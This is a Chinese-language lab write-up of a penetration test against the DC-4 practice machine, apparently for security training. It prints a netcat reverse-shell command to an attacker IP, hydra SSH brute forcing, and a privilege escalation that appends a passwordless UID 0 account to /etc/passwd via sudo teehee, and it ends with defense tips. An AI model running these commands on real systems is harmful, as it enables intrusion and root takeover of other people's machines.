DC4靶机渗透测试教学文档

1. 信息收集阶段

1.1 主机发现

使用netdiscover工具扫描本地网络，确定靶机IP地址：

netdiscover -i eth0 -r 192.168.84.0/24

1.2 端口扫描

使用Nmap进行端口和服务扫描：

nmap 192.168.84.180 -sV -A -p 80 --script=vuln

2. WEB测试阶段

2.1 访问Web服务

• 访问靶机的80端口
• 发现网页提示用户可能是admin

2.2 暴力破解

• 针对admin用户进行暴力破解
• 使用Burp Suite抓取登录请求包
• 成功破解密码为"happy"

2.3 命令注入分析

• 登录后发现页面功能按钮可能执行不同的Linux命令
• 通过Burp Suite抓包确认传参点是Linux命令
• 测试修改传参点进行命令注入

2.4 反弹Shell

在目标上执行反弹shell命令：

nc 192.168.84.174 10086 -e /bin/bash

(其中192.168.84.174是攻击机IP，10086是监听端口)

攻击机上进行监听：

nc -lvnp 10086

获取标准shell：

python -c 'import pty;pty.spawn("/bin/bash")'

3. 提权阶段

3.1 用户枚举

• 读取/etc/passwd文件发现有三个普通用户
• 检查每个用户的家目录
• 在jim用户的家目录发现old-passwords.bak文件

3.2 SSH爆破

由于开放了22端口，对jim用户进行SSH爆破：

hydra -l jim -P ./jim-oldpasswd.txt 192.168.84.180 ssh

(使用发现的old-passwords.bak文件作为密码字典)

3.3 邮件信息

• 登录jim用户后
• 在/var/mail下发现邮件
• 得知charles用户的密码为^xHhA&hvim0y

3.4 Sudo权限检查

登录charles用户后检查sudo权限：

sudo -l

发现可以使用teehee编辑器，且不需要root密码

3.5 利用teehee提权

teehee是一个小众的Linux编辑器，可以利用其sudo权限在/etc/passwd中追加用户条目实现提权。

提权步骤：

1. 在/etc/passwd中追加一个UID为0的用户：

echo 'xbxaq::0:0:root:/root:/bin/bash' | sudo teehee -a /etc/passwd

2. 登录新创建的用户：

su xbxaq

(由于密码字段为空，可直接登录)

4. 技术要点总结

4.1 passwd文件格式

[用户名]:[密码]:[UID]:[GID]:[身份描述]:[主目录]:[登录shell]

4.2 关键漏洞利用

1. Web应用命令注入漏洞
2. 弱密码问题
3. Sudo配置不当（允许无密码使用teehee编辑器）
4. 通过修改passwd文件实现提权

4.3 防御建议

1. 加强密码策略
2. 限制sudo权限
3. 对用户输入进行严格过滤
4. 定期检查系统权限配置
5. 监控敏感文件如/etc/passwd的修改

5. 资源获取

关注"小白学安全"公众号，回复"DC"获取DC系列靶机镜像。